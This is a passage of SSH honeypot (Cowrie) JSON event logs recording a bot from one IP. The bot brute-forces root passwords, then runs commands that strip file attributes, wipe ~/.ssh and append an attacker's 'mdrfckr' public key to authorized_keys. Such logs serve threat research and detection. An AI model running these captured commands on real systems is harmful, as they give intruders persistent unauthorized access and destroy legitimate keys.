6","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:55:59.073260Z","src_ip":"212.227.235.229","session":"a4369cf888da"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:56:00.407257Z","src_ip":"212.227.235.229","session":"a4369cf888da"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:00.733433Z","src_ip":"212.227.235.229","session":"a4369cf888da"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:00.743256Z","src_ip":"212.227.235.229","session":"d851af9ccce7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42312,"dst_ip":"1.2.3.4","dst_port":22,"session":"03ad7f629233","protocol":"ssh","message":"New connection: 212.227.235.229:42312 (1.2.3.4:22) [session: 03ad7f629233]","sensor":"my-vps","timestamp":"2025-09-08T21:56:06.326068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:06.326811Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:06.633430Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.login.success","username":"root","password":"root123456*","message":"login attempt [root/root123456*] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:56:07.899134Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:56:08.531358Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:56:08.532040Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:56:08.533144Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:08.840440Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:56:09.551542Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:56:09.552292Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:56:09.860833Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:09.861977Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42328,"dst_ip":"1.2.3.4","dst_port":22,"session":"e34075beec07","protocol":"ssh","message":"New connection: 212.227.235.229:42328 (1.2.3.4:22) [session: e34075beec07]","sensor":"my-vps","timestamp":"2025-09-08T21:56:10.046824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:10.047602Z","src_ip":"212.227.235.229","session":"e34075beec07"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:10.296329Z","src_ip":"212.227.235.229","session":"e34075beec07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38454,"dst_ip":"1.2.3.4","dst_port":22,"session":"480e91c27424","protocol":"ssh","message":"New connection: 212.227.235.229:38454 (1.2.3.4:22) [session: 480e91c27424]","sensor":"my-vps","timestamp":"2025-09-08T21:56:10.344153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:10.344782Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:10.637327Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:56:11.332637Z","src_ip":"212.227.235.229","session":"e34075beec07"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32912,"dst_ip":"1.2.3.4","dst_port":22,"session":"2cf0b839c5fa","protocol":"ssh","message":"New connection: 212.227.235.229:32912 (1.2.3.4:22) [session: 2cf0b839c5fa]","sensor":"my-vps","timestamp":"2025-09-08T21:56:11.726854Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Cc123456789","message":"login attempt [root/Cc123456789] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:56:11.847791Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:11.975725Z","src_ip":"212.227.235.229","session":"2cf0b839c5fa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:56:12.494653Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:56:12.495523Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T21:56:12.496598Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:12.583010Z","src_ip":"212.227.235.229","session":"e34075beec07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:12.790372Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45182,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f9379d4ae57","protocol":"ssh","message":"New connection: 212.227.235.229:45182 (1.2.3.4:22) [session: 6f9379d4ae57]","sensor":"my-vps","timestamp":"2025-09-08T21:56:12.833813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:12.834543Z","src_ip":"212.227.235.229","session":"6f9379d4ae57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:13.083200Z","src_ip":"212.227.235.229","session":"6f9379d4ae57"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:56:13.398286Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:56:13.399182Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:56:13.695232Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:13.696237Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38466,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca0bb48e4788","protocol":"ssh","message":"New connection: 212.227.235.229:38466 (1.2.3.4:22) [session: ca0bb48e4788]","sensor":"my-vps","timestamp":"2025-09-08T21:56:13.985221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:13.985983Z","src_ip":"212.227.235.229","session":"ca0bb48e4788"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:56:14.112434Z","src_ip":"212.227.235.229","session":"6f9379d4ae57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:14.277088Z","src_ip":"212.227.235.229","session":"ca0bb48e4788"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:14.362551Z","src_ip":"212.227.235.229","session":"6f9379d4ae57"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:14.421470Z","src_ip":"212.227.235.229","session":"03ad7f629233"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:56:15.481979Z","src_ip":"212.227.235.229","session":"ca0bb48e4788"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:16.775875Z","src_ip":"212.227.235.229","session":"ca0bb48e4788"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50858,"dst_ip":"1.2.3.4","dst_port":22,"session":"1427503832b3","protocol":"ssh","message":"New connection: 212.227.235.229:50858 (1.2.3.4:22) [session: 1427503832b3]","sensor":"my-vps","timestamp":"2025-09-08T21:56:17.069986Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:17.070649Z","src_ip":"212.227.235.229","session":"1427503832b3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:56:17.366450Z","src_ip":"212.227.235.229","session":"1427503832b3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T21:56:18.586738Z","src_ip":"212.227.235.229","session":"1427503832b3"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:18.882802Z","src_ip":"212.227.235.229","session":"480e91c27424"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:56:18.883992Z","src_ip":"212.227.235.229","session":"1427503832b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60752,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8a19410257d","protocol":"ssh","message":"New connection: 212.227.235.229:60752 (1.2.3.4:22) [session: a8a19410257d]","sensor":"my-vps","timestamp":"2025-09-08T21:56:26.011134Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:56:26.143354Z","src_ip":"212.227.235.229","session":"a8a19410257d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","a